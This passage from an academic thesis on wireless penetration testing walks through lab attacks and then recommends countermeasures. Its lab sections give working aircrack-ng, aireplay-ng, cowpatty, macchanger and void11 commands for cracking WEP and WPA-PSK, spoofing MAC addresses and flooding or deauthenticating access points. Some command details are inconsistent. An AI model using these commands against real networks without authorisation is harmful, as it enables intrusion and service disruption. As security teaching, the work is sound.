machine. The information gathered from NetStumbler is that there exists an unauthorized

“rogue” access point with a SSID of “testnetwork “, MAC address of 00:0F:66: DF:

87:45, the channel used is 6 and the vendor is Linksys. Furthermore, the speed is 11

Mbps and has no security in place. For an attacker this is the best scenario to get in since

there is nothing he will have to do besides connecting to the rogue access point and in

one step he is on the wired network bypassing all the security in place. All the security

measures such as firewalls, IDS, and routers are useless. The rogue access point will

serve as an entry door.

64

A security measure could be to disable the SSID from broadcasting. In this case

the employee does not want to be caught by the security manager. The pen-tester should

be aware of this. Figure 3.3 shows the output of Netstumbler with the Wireless Access

Point not broadcasting its SSID [Bayles 2007].

Figure 3.3 Output of Netstumbler

Netstumbler was not able to find the wireless access point with a SSID of

“testnetwork” whenever the AP it is not broadcasting its SSID. The reason is that

Netstumbler transmits a broadcast Request probe to discover the WLAN. Most access

points respond to a Broadcast Request by default. However, if the access point ceases to

respond to a request, Netstumbler can no longer detect it. It would be wrong to try only

with one tool. A rule of thumb is to try at least with two different tools.

65

The second tool selected is Kismet which is a Linux based tool, and it is included

in the Backtrack 3.0 Live CD. Figure 3.4 shows all the networks on the range of the pen-

tester using Kismet.

Figure 3.4 Access Point Broadcasting

By default kismet is in autofit sort mode. Unfortunately in this mode the

penetration tester cannot obtain a lot of information about the different access point

beyond the information displayed in the default view. To change the sort mode, press the

s key to bring up a menu of the sort options. Since the goal is to identify the networks that

are not broadcasting their SSID the penetration tester can sort by SSID by choosing the s

option.

66

Once the networks are sorted, there are two wireless access point (AP) that are not

broadcasting their SSID. To get additional information about those two networks. Using

the arrow keys, highlight the access point with no SSID and press Enter to get the

Network Details (Figure 3.5)

Figure 3.5 Network Details

In the network details, the penetration tester finds the MAC Address (Basic

Service Set Identifier [BSSID]) of the Wireless Access Point. Since the max rate is 11.00

Mbps the penetration tester can determine that it is an 802.11b Access Point operating in

infrastructure mode. Also, information about the manufacturer, which in this case is

Linksys, is displayed. Furthermore, although there is an indicator of whether the network

67

is encrypted or not in the main screen, this indicator does not identify the type of

encryption.

Yet, in the network detail the penetration tester can get the type of encryption in

place which in this case is none since there is no encryption. Once all this information is

reported, to return to the main menu just press the q key. Another feature of kismet is

that it allows the pen-tester to determine who is actually connected to a network. By

highlighting the access point and pressing the c key, the penetration tester is presented

with a list of any clients associated with the network. In client view, the penetration

tester can determine the MAC address of any clients associated with the access point.

Additionally, in some cases, the type of the card is displayed. The number of data packets

that Kismet has seen and the number of those packets that are encrypted are identified.

Once Kismet determines the Internet Protocol (IP) address of a specific client it is noted

as well as the strength of the signal [Bayles 2007].

This information is important to determine the people that in most cases are

breaking a rule by setting a rogue access point. With the MAC address a pen-tester can

review the hardware list of the company. Since the MAC address is unique in each

wireless card, the computer with that wireless card on it will be determined. By

determining the computer that has the wireless card the pen-tester can accurately find the

name of the employee who is using the rogue access point. Once the pen-tester has

determined the existence of a rogue access point and since the AP has no security enable,

the pen-tester now has access to the wired network. Indeed, all the security measures are

useless with the rogue access point in place.

68

3.1.1 Cracking WEP

The second scenario was having the Access Point with the WEP encryption

method enable. The purpose of this scenario was to test the WEP cracking tools. As

mentioned before the tools used to crack WEP were the Aircrack-ng Suite and WEP

crack. Yet, before proceeding any further it was important to verify that the computer

used was able to capture traffic. For this, the wireless card has to be configured with the

correct drivers. In order to test whether the wireless card is configured or not the Airmon-

ng script was used. The Airmon-ng script places the interface in monitor mode. If it is

not possible to start the interface in monitor mode, there are problems with the drivers of

the wireless card. One of the disadvantages of using Backtrack from a live CD is not

being able to write to the CD. So every time that Backtrack is loaded the pen-tester needs

to install the correct drivers. Once the interface is set in monitor mode the penetration

tester can start capturing packets.

Although any packet analyzer capable of writing cap format can be used, the

Airodump-ng tool was used because it is included in the Aircrack-ng suite. By default,

Airodump-ng hops on all channels; however, there is an option to lock to a specific

channel if desired. The command used to set Airodump-ng was:

airodump-ng --channel 6 --write test -b 00:16:B6:6C:CD:92 wifi0

• --channel specifies the channel to lock on. The access point was working on

channel 6.

• --write to write the packets into a file which in this case is test. cap

• -b is the BSSID of the access point.

• Wifi0 is the interface used.

69

Airodump-ng shows the number of packets and IVs that have been collected, as

well as all the stations connected to the Access Point as shown in figure 3.6.

Figure 3.6 Airodump-ng Captures Packets

After using Airodump-ng to determine an allowed MAC address which in this

case was 00:18:E7:1D: EF: CD, it was necessary to change the MAC address because

whether MAC address filtering is used as an ineffective security mechanism, penetration

testers need to be able to spoof MAC addresses. Backtrack provides a mechanism to

accomplish this, called macchanger. The command line used to change the MAC address:

macchanger –m 00:18:E7:1D: EF: CD wifi0

• -m to set a manual MAC

• 00:18:E7:1D: EF: CD is the MAC address of the station that is allowed to

connect.

• Wifi0 is the interface whose MAC address is going to be changed.

70

Once the MAC address was successfully changed, the next step was to generate

enough packets to crack WEP. Since only one station was connected to the Access Point

it would have taken too much time until the station connected would have generated the

packets needed. The used to inject packets was Aireplay-ng which is also included in the

Airocrack-ng suite.

Aireplay-ng has different types of attacks that can be used to inject packets. The

two most commons are the ARP request attack, and the packet replay attack. These two

attacks where used. The first attack needs to gather an ARP packet to replay that ARP

packet. The command line used:

aireplay-ng -3 –e testnetwork –b 00:12:17:9E:85:C7 –h 00:18:E7:1D: EF: CD wifi0

• -3 is the ARP replay attack.

• -e is the ESSID of the access point.

• -b is the MAC address of the access point.

• -h is the MAC address of the source wireless interface.

• Wifi0 is the interface

The attack starts reading packets and capturing ARP request packets as shown in

figure 3.7. It uses these packets to replay back to the access point. The access point

generates a respond for each packet received. Each packet generated by the access point

has a different IV number.

71

Figure 3.7 Aireplay-ng starting to inject packets

The number of packets started to increase dramatically once the attack was in

progress. The number of packets sent by the station with MAC address of 00:18:E7:1D:

EF: CD increased. The penetration tester can verify this by returning to the Airodump-ng

window. The #Data column was rising quickly, and #/s column showed the rate of

injection.

The other way to generate traffic is by injecting normal packets instead of ARP

packets. The reason for using this attack is to avoid a Wireless Intrusion Detection

System that could be monitoring the wireless network. The command line used:

aireplay-ng -2 –b 00:21:29:CA:BA:62 –d FF:FF:FF:FF:FF:FF wifi0

• -2 is the Packet replay attack.

• -b is the MAC address of the access point.

• -d is to broadcast to all the station connected to the network.

• Wifi0 is the interface

72

Figure 3.8 The packet replay’s attack

The same as with the ARP packet replay attack, the number of packets started to

increase dramatically. The final step was to create one last window and run Aircrack-ng:

aircrack-ng –b 00:12:17:9E:85:C7 test-01.cap

• -b selects the target AP.

• Test-01.pcap is the name specified when starting Airodump-ng.

In Aircrack-ng version 1.0 the default attack used to crack WEP is the PTW

attack which decrypts the key faster than previous attacks. Regardless of the method by

which WEP is cracked, once found the key is displayed in hex format (Figure 3.9). In this

case the key was found with 9978 IVs. With the key the pen-tester can connect to the

wireless network and then to the wired network.

73

Figure 3.9 Aircrack-ng displaying the Key

3.1.2 Cracking WPA-PSK

The third scenario was having a wireless network encrypted with the WPA-PSK

encryption method. The passphrase used was eight-character long without any special

symbol. In this case, the techniques considered were: WPA dictionary attacks, brute force

attacks. The tools used to crack WPA were CoWPAtty, and Aircrack-ng 1.0. These two

tools are included with the Backtrack Live CD.

The first step was to capture the four-way EAPOL handshake using Airodump-ng

since it was already working. In order to get these four packets a deauthentication attack

was performed using aireplay-ng. The command used:

aireplay-ng -0 1 –a 00:12:17:9E:85:C7 –c 00:18:E7:1D: EF: CD wifi0

• -0 specifies the deauthentication attack.

• 1 is the number of deauthentication packets to send; 0 is continuous.

• -a is the MAC address of the Access Point.

74

• -c is the MAC address of the client to deauthenticate; if left blank, all clients are

deauthenticated.

• Wifi0 is the interface.

A deauthentication attack will probably alert any wireless Intrusion Detection

System (IDS). If the idea is not to be detected the penetration tester will have to wait until

the EAPOL handshake occurs naturally. Upon reauthentication, the four-way handshake

is transmitted and captured with Airodump-ng. With the file of the four-way handshake

collected with Airodump-ng and the file of the precomputed table that contains the SSID

of the wireless access point the next step was to start CoWPatty. The command used:

cowpatty –f password.txt –r wpa-01.cap –s testnetwork

• -f is the wordlist.

• -r is the file with the four way hand shake.

• -s is the SSID of the Access Point.

In this case, the passphrase was in the dictionary file so coWPatty was able to

process and find the key in a short period of time. Figure 3.10 shows the process of

searching.

75

Figure 3.10 shows the process of searching

It is important to mention that although cracking WPA/WPA2 – PSK seems to be

easer than cracking WEP, WPA/WPA2 – PSK relies on brute force and dictionary attacks

which are sometimes computationally infeasible. With an appropriate key length the

penetration tester can make these two methods less effective. For example with an eight-

character long key only using 62 characters (alphanumerical characters), the total key

space or the dictionary needed for an eight-character password is in excess of 218 trillion

which is far beyond any current storage capabilities. Furthermore, coWPatty can only try

30-60 words per second with 218 trillion possibilities it could take years to try all the

possibilities.

76

3.2 Internal pen-test lab

In this lab the goal was to use enumeration tools and address the most common

configuration flaws. Furthermore, to deploy denial of service (DoS) and man in the

middle (MITM) attacks. The layout of this lab is:

Figure 3.11 Network Layout

3.2.1 Enumeration Attacks

The first tool used was Nmap, and the command used was:

nmap –T –sV –v –O 192.168.1.1-254

• -T to set the timing and performance. Higher is faster.

• -sV Type of scan.

• -v to increase the verbosity level, causing Nmap to print more information about

the scan in progress.

• -O enables OS detection.

Figure 3.11 shows Nmap running.

77

Figure 3.11 Nmap executing

On the left hand side of the window, Nmap displays all the devices that belong to

the wireless network and were live at the moment of the scanning. Table 3.1 is a

summary of Nmap results.

Table 3.1 Nmap Results

IP Address Mac Address Card Brand Ports Open OS

192.168.1.1 00:12:17:9E:85:C8 Cisco-Linksys 80 Router

192.168.1.101 00:14:22:4A:FC:20 Dell 135,139,445 Windows

192.168.1.102 00:18:E7:1D:EF:CD Cameo 135, 139, 3389 Windows

192.168.1.106 00:14:22:4A:CF:6E Dell 135, 139, 445 Windows

192.168.1.107 00:01:03:1C:A3:89 3com 22, 111, 933 Linux

192.168.1.108 00:01:03:1C:A3:B4 3com 22, 631 Linux

192.168.1.109 00:01:03:1C:B5:0C 3com 135, 139, 445, 1025 Windows

192.168.1.111 00:01:03:1C:B5:0C 3com None None

78

By default, Nmap 4.20 with Backtrack scans 1,697 ports for common services.

This will catch most open TCP ports that are out there. However, sometimes system

administrators may run ports on uncommon ports, practicing security through obscurity.

Without scanning those uncommon ports, the penetration tester may be missing these

services. In order to run Nmap to scan for all those ports the –p0 -65535. However, this

type of scan takes a long time. All this information is used to exploit vulnerabilities on

the services, or ports. It is out of the scope of the project to exploit vulnerabilities in open

ports or services with default configuration.

However, in order to prevent hackers from exploiting vulnerabilities, there are

several tools that allow the system administrator to assess the security on all the stations

connected to the network. One of the most common is GFI LANguard Network Security

Scanner. This tool check databases based on OVAL and SANS Top 20, providing over

15,000 vulnerability assessments when the network is scanned. Also, LANguard gives

the penetration tester the information and tools needed to perform multi-platform scans

across all environments. The goal is to analyze the network security health and

effectively install and manage patches on all stations across different operating systems

[Bayles 2007].

79

3.2.2 Denial of Service Attacks

As mentioned before, wireless networks are very vulnerable to this type of attacks

due mainly for two reasons. The first one is the lack of frame authentication in 802.11

management frames such as beacons, association requests, and probe responses. The

functionality inherent in the MAC layer of a 802.11 network allows wireless systems, to

discover, join, and roam free on the network, completely exposed to the elements. This

implicit trust among wireless devices makes it easy for an attacker to bring down

individual hosts, or even an entire wireless network [Bellardo 2003].

There are many different types of Denial of Service attacks (DoS) which can

impact radio signals, network protocols, and even wireless applications. The attacks

performed in this project were the deauthentication and the authentication attacks. A

deauthentication attack puts the client in a state of complete disconnection. The tool used

was Aireplay-ng. The command line used:

aireplay-ng -0 1 00:12:17:9E:85:C7 wifi0

• -0 specifies the deauthentication attack.

• 0 is the number of deauthentication packets to send; 0 is continuous.

• -a is the MAC address of the Access Point.

• -c is the MAC address of the client to deauthenticate; if left blank, all clients are

deauthenticated.

• Wifi0 is the interface.

80

All the stations connected to the Access Point were deauthenticated and because

aireplay-ng continued to send deauthenticate packets no one was able to reconnect to the

access point. The second attack exploits a weakness in the way access points queue

incoming client requests. These requests are stored in the client association identifier

table (AID). The AID table can only handle a limited number of wireless client

connections. Once this memory is filled, most APs will no longer accept incoming

association requests. One of the most common tools to create an association flooding

attack is Void11.

The command used was:

void11_penetration wifi0 -D -s 3 -s -S testnetwork -B 00:12:17:9E:85:C7

• Wifi0 is the interface.

• -s is the association flood attack.

• -S is the SSID of the Access Point.

• -B is the BSSID of the Access Point.

This attack overloaded the AID table within seconds, making the AP to freeze.

81

4. EVALUATION AND RESULTS

Once the penetration testing has finished the next step is to report the findings

with all those with an interest, such as network administrator, and manager. The reporting

phase is as important as the testing itself. Writing a great report requires a great deal of

effort, sometimes it can take three times as long as the work itself. The report shows the

completeness and rigor of the pen-tester’s testing methodology. The report should include

the following sections [Bayles 2007]:

• Executive Summary

• In scope, and Out of Scope Statements

• Objectives

• Nature of Testing

• Analysis

• Summary of Findings and Vulnerability Summary

• Countermeasure(s) to Control de Vulnerability

• Conclusion

• Supporting Documentation

Many organizations make the major mistake of not following up swiftly. It is one

thing to identify vulnerabilities; it is another thing altogether to fix the problem.

Companies are in worse legal position if they do not fix known problems than if they do

not know about the problems. Furthermore, if companies follow up with delays, they also

risk the money and time spent on the test itself [Bayles 2007].

82

4.1 External pen-test lab

4.1.1 First Scenario

The first vulnerability found was the rogue access point (AP) discovered with no

security. The access point was connected to the main wired network creating a back door

to any malicious hacker. Furthermore, the AP made all the others security measures

useless. Most of the time there exists a policy or rule that prohibits connecting any device

with out the consent of the security manager; however it is not only matter of

establishing a policy, there have to be controls to assure that the policy is being followed

by all the employees. Also, security it is not only matter of the security manager, it

involves all the employees in the company. It has been reported that the majority of

successful attacks were due to the human factor. The countermeasures to avoid and

eliminate this vulnerability are [Bayles 2007]:

• Using active and passive scanner tools to identify possible illegal access points.

• Keeping employees inform about the security issues of new technology.

As demonstrated hiding the SSID of the access point is not an effective security

measure. Using tools such as Kismet, Airodump-ng the malicious hacker can easily find

the access point.

4.1.2 Second Scenario

In the second scenario the vulnerability found was the use of WEP encryption

method. The WEP encryption method was easily broken. Table 4.1 shows the amount of

time and number of packets needed to crack both WEP 64 bits and 128 bits.

83

Table 4.1 Cracking WEP

WEP Number of Packets

Time to Decrypt (sec)

64 15,000 5

128 70,000 10

Having tools to inject packets to a wireless network makes the process of cracking

WEP even easier for malicious hackers. They do not need to wait until associated users

generate the amount of packets needed to crack WEP; they can generate traffic and

within seconds crack the encryption method. The countermeasures to this vulnerability

are [Bayles 2007]:

• Not using the WEP encryption method anymore. There are other methods more

secure.

• Using a Wireless Intrusion Detection System (WIDS) to monitor the air space and

detect whenever the malicious hacker is injecting packets.

Wireless Intrusion Detection System in their simplest form are designed and built

to monitor and report on network activities, or packets, between communicating devices.

The most common WIDS are AirMagnet Distributed 4.0, AirDefense Enterprise V4.1 or

the Red-M’s set of products. AirMagnet sensors report network performance information

and alerts to a management server within a SQL database, which is monitored through a

management console. One of the most important features is the ability to identify and

give aliases to various wireless MACs, thus making it easier to identify all actual users

and illegal users. By using the Find tool the security manager can manually and

physically track down the location of the rogue user. Furthermore, AirMagnet will even

pick up DoS attacks as they happen. Administrator can disable a site and re-address it,

and if the attacker is nearby potentially track him down [Broadcom 2006].

84

AirDefense system consists of a server running Linux with distributed wireless

AP sensors and a Java-based Web Console. AirDefense’s strong suit is its policy-based

approach to monitoring wireless devices and traffic. There are four main categories for

policies: configuration, performance, vendor, and channel. All of the policy thresholds

are configurable. For instance, if the company allows only Cisco NICs, then all other

NICs could be excluded so that a non-Cisco NIC would immediately trip an alarm

[Broadcom 2006].

The Red-M set of wireless security products includes Red-Alert and Red-Vision.

Red-Alert is a standalone wireless probe which can detect unauthorized 802.11 a/b/g

networks. Red-Vision has three components. Red-Vision server is the heart of Red-

Vision and contains both the intra-process communications engine and the internal

standards compliant database. Red-Vision Laptop Client is the agent installed on every

laptop computer connected o the wireless network. It collects data from the end user and

also monitors the hardware use. Red-Vision Viewer is a geographic based interface,

which is unique, since no other wireless software product can offer the wireless network

administrator this much control. Also, Red-Vision viewer provides control over every

separate device/appliance/ hardware type that connects to the network no matter how

many different pieces of equipment make up the wireless environment [Broadcom 2006].

85

4.1.3 Third Scenario

In the third scenario the vulnerability found was the use of an eight-character

passphrase to generate the WPA/WPA2 key. It was possible to crack WPA/WPA2

encryption method because of the length of the passphrase which was too short. For

instance, using a passphrase of twenty characters long where the characters are

alphanumeric values only (62 characters). A brute force attack will have to try 104, 857,

600, 000, 000, 000, 000, 000, 000 times. If CoWPatty can only tries 60 words per second

it will take 55, 416, 878, 065, 279, 891 years to try all possible words. WPA/WPA2 –

PSK it is a good choice for SOHO environments. As proven it is computational infeasible

to crack this encryption method when using long passphrases. For enterprises the best

option is WPA-RADIOUS which has not been cracked yet.

4.2 Internal Pen-Test lab

4.2.1 Vulnerability Assessment

In order to detect and eliminate possible vulnerabilities there exist tools such as

Nessus. Nessus is proprietary comprehensive vulnerability scanning software. It is goal is

to detect potential vulnerabilities on the tested system. For example:

• Vulnerabilities that allow a remote attacker to control or access sensitive data on a

system.

• Misconfiguration such as open mail replay or missing patches.

• Default passwords, and blank/absent passwords on system accounts.

86

Although the stations used in this lab did not have many services or ports open

because none of these stations were servers. One of the most important rules for

hardening a host system is the concept of minimization. Only essential applications and

operating system components should be loaded on host systems. Software vulnerabilities

account for a large percentage of the security incidents that occur. Thus, the less software

on a host generally equates to less exploitation of software vulnerabilities. Another

common rule is the isolation of services. It is best to isolate services such as email, www,

and ftp on separate physical systems. This way, if a service is exploited by an intruder,

the potential impact on the critical service would be limited [CERT 2003].

4.2.2 Denial of Service Attacks

There are several procedures that a security manager can do to protect his systems

from a DoS attacks. Many of these are free and relatively simple. It is important to

determine what is normal in the wireless network. For example [Beaver 2005]:

• Protocols in use

• Minimum, maximum, and average number of connections

• Minimum, maximum, and average throughput

• RF signal strength

• Any notable RF interference

• Number of Users

This information is invaluable when a security manager is trying to determine

whether a Denial of Service attack is about to occur, is occurring, or has already

occurred.

87

Another tool to prevent or detect DoS attacks is the use of wireless intrusion detection

system (WIDS). A WIDS looks for [Beaver 2005]:

• Unauthorized MAC addresses

• Unauthorized broadcast traffic

• Jamming

• Association floods

• Authentication floods

• Disassociation attacks

• Deauthentication attacks

88

5. FUTURE WORK

Security threats are an ever increasing problem to modern computing

infrastructures. Attempts to characterize the security of a large networked system are the

focus of several ongoing research efforts. One approach is to perform penetration testing

of an actual system manually by Red Teams. Such approach generates only one of what

may be many attack paths through a system [Broadcom 2006]. The current practice on

security only focuses on specifics, such as firewall testing, web server testing, and etc. On

the other hand, the other approach is to create a formal model of the system and then

obtain comprehensive security metrics by analyzing the models. The most common

methodology used by pen-tester is the Open-Source Security Testing Methodology

Manual (OSSTMM) 2.1 created by Pete Herzog. However, this methodology does not

encompass all the security issues related to wireless networks since it is intended to be a

guide for wired networks [Beaver 2005]. Thus, the need for research in this field is

required to produce a generic model that can be used as a basic guideline when doing

wireless penetration testing.

Another field of research is the one related to Wireless Intrusion Detection

Systems which is a countermeasure to all the already explained security flaws in the

wireless networks. To be effective, WIDS must be run online, in real time because

although offline, or after the event IDS are useful for audit trail, this type of IDSs will not

prevent an attack taking place. Real time IDS needs to be able to stream data across a

network from sensors to a central point where it can be stored, analyzed. This additional

network traffic running concurrently can significantly impact network performance so

sufficient bandwidth is a prerequisite [Broadcom 2006].

89

Furthermore, today’s wireless intrusion detection systems such as AirDefense

Guard or AirMagnet Distributed; utilize a misuse, signature, based IDS which has the

drawback of only being as good as the signature files and known attack pattern

recognition files given to them. The problem is that the wireless network using this

security tool has protection against what are known to be attacks. The new attacks will be

the one that gets the wireless network. This underlines the need to have an efficient

mechanism for keeping all network security components with rule or signature based

tables up to date [Broadcom 2006].

Another field of research is the use of neural networks in wireless intrusion

detection systems since a neural network is the solution to the problem of determining

what normal traffic is. A neural network is a mathematical model based on biological

neural networks. They can be used to model complex relationships between inputs and

outputs or to find patterns in data. One of the biggest advantages of neural networks is the

possibility of learning.

90

6. CONCLUSION

With the emergence of network globalization and advent of Internet being the

major tool for international information exchange and platform for the future, security

has always been the most talked about topics. It is clear that wireless solutions are

transforming the way people work and live. Using wireless enabled devices, it is already

possible to access the internet from public areas such as coffee shops, hotels and

motorway rest stops. All of this is possible through the use of Wireless Local Area

Networks (WLANs). Large Businesses are starting to wake up to the productivity

benefits and cost advantages of WLAN. Furthermore, the development of affordable

products and services has allowed small to medium businesses to invest in the

deployment of WLAN.

As with all networks, wired or wireless, the security threats are numerous but with

WLAN the security manager has to look at these security threats in a different way. The

physical medium on which wireless network transport data is like having network cables

running outside the perimeter of the building. The bottom line is that wireless

networking, as a new technology, needs new security controls to secure it. Wireless

Penetration Testing is a new methodology to address the security of 802.11 wireless LAN

networks.

91

Wireless Penetration testing has been determined to be the most effective way to

find exploits and to proof whether a system is vulnerable. Also, it often allows the

security analyst to find new vulnerabilities. Penetration testing should play a role in every

company’s network security policy. It gives a bird-eye perspective on current security. It

also, helps to identify what is the information that is exposed to the public or the Internet

world. By making up attack scenarios to best closely model all possible situations,

wireless penetration testing helps to identify and narrow down security risks.

Furthermore, it also helps to identify overlooked areas in sense of security and allow

customers to improve their current systems.

The results of the wireless penetration tests have demonstrated that one of the

major security flaws in the wireless networks is the use of the Wired Equivalent Privacy

(WEP) encryption method. It has been proven that this encryption method it is easily

cracked with tools such as Aircrack-ng and Wepcrack. It is only matter of gathering a few

thousands packets and these tools will easily crack the WEP key within seconds. Also, if

there is not much traffic being generated there are tools such as Aireplay-ng and

Packetforge-ng that can generate and inject packets so that the Access Point generates the

necessary number of IVs to crack the WEP key.

Even worse is that there are still many access points with no encryption method

in place. Also, hiding the SSID it cannot be considered as a security measure because

there are tools that can gather information of the access point even when the access point

is not broadcasting its SSID. Furthermore, the MAC address filtering is not a security

measure as well since as already shown tools such as Airodump-ng, Kismet, Wireshark

can easily get the MAC address of authorized users.

92

A solution for SOHO users to the encryption problem is the use of WPA with a

passphrase of twenty characters or longer. The passphrase should include special

characters, upper case characters and not typical words that can be found in a dictionary.

A solution of big enterprises is the use of WPA-RADIOUS. This technology has been

proven to be secure, and so far there has not been any exploit found.

Finally, a security measure to detect attacks such as enumeration, Denial of

Service, and man in the middle is a wireless intrusion detection system (WIDS).

Knowing what it is normal is crucial. Every security manager should gather from the

wireless network at least the protocols in use, the minimum, maximum and average

number of connections, the average throughput, and the numbers of users. This

information is the baseline to understand what is right and what is wrong in the wireless

network. WIDS technology is moving toward the use of neural networks and fuzzy logic

to define what normal traffic is and to defend the wireless network from new intrusion

types.

In conclusion, penetration testing is a good method for finding holes and security

flaws in all systems of an organization. However, organizations should always realize the

limitations of penetration testing. The results of a test only provide a snapshot of a

system’s security at a given time and it is only as good as the tester conducting it. New

vulnerabilities appear frequently and regular testing needs to be undertaken.

93

BIBLIOGRAPHY AND REFERENCES

[Arbaugh 2003] Arbaugh W.A., “Wireless security is different” IEEE: Computer

Volume: 36, Issue: 8 pp. 99 – 101 Aug. 2003

[Arbaugh-Shankar 2001] Arbaugh W.A., N. Shankar, and J. Wang, "Your 802.11

Network Has No Clothes," Proc. 1st IEEE Int"l Conf. Wireless LANs and Home

Networks, IEEE Press, 2001, pp. 131–134.

[Bayles 2007] Bayles Aaron, Butler K. and Collins A. Penetration Tester’s Open Source

Toolkit. Syngress Publishing, 2007.

[Beaver 2005] Beaver, K and Davis, P. Hacking Wireless Networks for Dummies. Wiley

Publishing, Inc., 2005.

[Bellardo 2003] Bellardo J. and Savage S., "802.11 Denial-of-Service Attacks: Real

Vulnerabilities and Practical Solutions," Proc.12th Usenix Security Symp., Usenix

Assoc., 2003, pp. 15–28

[Broadcom 2006] Broadcom Corporation. 802.11n: Next-Generation Wireless LAN

Technology. Available from www.broadcom.com/docs/WLAN/802_11n-WP100-R.pdf

[Cam-Winget 2003] Cam-Winget N., "Security Flaws in 802.11 Data LinkProtocols,"

Comm. ACM, vol. 46, May 2003, pp. 35–39.

94

[CERT 2003] CERT/CC Training and Education Center, Advanced Information

Assurance. November 2003, pp. 14-50.

[Chinitz 2007] Chinitz L. Interference Immunity of 2.4 GHz Wireless LANs. Available

from http://www.hometoys.com/htinews/aug01/articles/immunity/immunity.htm (Visited

August 2008).

[Hassell 2004] Hassell, J., Wireless Attacks and Penetration Testing. Home Page.

Available from www.securityfocus.com/infocus/1785 (visited March. 2, 2008).

[Housley 2003] Housley R. and Arbaugh W., "Security Problems in

802.11-based Networks," Comm. ACM, vol. 46, no. 5, 2003,pp. 31–34.

[Hurley 2007] Hurley C. and Thornton F., WarDriving & Wireless Penetration Testing.

Syngress Publishing, Inc., 2007.

[INSIGHT 2008] Insight Consulting. Home Page. Available from www.insight.co.uk/

(visited March 27, 2008).

[ISS 2008] Internet Security Systems, Penetration Tests: The Baseline For Effective

Information Protection. Available from

http://ww.iss.net/documents/whitepapers/pentestwp.pdf. pp. 2-4. pp. 2-4.

95

[Kowalski 2006] Kowalski M.B., Bertolino K.D; and Basagni S., “Hack Boston:

Monitoring Wireless Security Awareness in an Urban Setting” Canadian Conference on

Electrical and Computer Engineering, 2006. CCECE '06. May 2006 Page(s):1308 – 1311.

[Kruse 2002] Kruse, W. and Heiser, J. Computer Forensics: Incident Response

Essentials. Addison-Wesley, Lucent Technologies, 2002.

[Miller 2001] Miller S.K., “Facing the Challenge of Wireless Security.” IEEE Computer

Volume: 34, Issue: 7 pp. 16 – 18. July 2001

[Nichols 2002] Nichols, R and Lekkas, P. Wireless Security. Mcgraw-Hill, 2002.

[Puneet 2008] Puneet M. Guide to Penetration Testing. Available from

http://searchnetworking.techtarget.com/general/0,295582,sid7_gci1083719,00.html

(visited May 2, 2008).

[Stephen 2006] Stephen, N and Shenk, J. Penetration Testing: Assessing Your Overall

Security Before Attackers Do. SANS Analyst Program.

[Siles 2007] Siles, R. Wireless forensics: Tapping the Air I. Home Page. Available from

www.securityfocus.com/infocus/1884 (visited Feb. 22, 2008).

96

[Siles 2007] Siles, R. Wireless forensics: Tapping the Air II. Home Page. Available from

www.securityfocus.com/infocus/1885 (visited Feb. 22, 2008).

[Tamini 2006] Tamimi A. Security in Wireless Data Networks: A Survey Paper.

Available from http://www.cs.wustl.edu/~jain/cse574-06/ftp/wireless_security/index.html

(visited September 2008).

[Turnbull 2007] Turnbull B. and Slay J. Wireless Forensic Analysis Tools for use in

Electronic Evidence Collection. IEEE Comput. (Feb 2007).

[VAC 2008] Vulnerability Assesment Co. Home Page. Available from

www.vulnerabilityassessment.co.uk/ (visited March. 5, 2008)

[Vladimirov 2004] Vladimirov, A. and Gavrilenko, K. Wi-Foo: The secret of Wireless

Hacking. Addison-Wesley, Pearson education. 2004.

[Walker 2000] Walker J.R., Unsafe at Any Key Size: An Analysis of the WEP

Encapsulation, IEEE 802.11 Task Group E IEEE 802.11/00-362, Oct. 2000,

http://grouper.ieee.org/groups/802/11/Documents/DocumentHolder/0-362.zip. (visited

May 12, 2008

[WildPackets 2008] Wild Packets Inc. 802.11 WLAN Packets and Protocols. Available

from http://www.wildpackets.com/support/compendium/manual_appendices/overview

(Visited August 2008).

97

[Zyren 2007] Zyren, J. and Petrick A. IEEE 802.11 Tutorial. IEEE Comput. Soc. (March

2006).

98

APPENDIX A – DISC COPY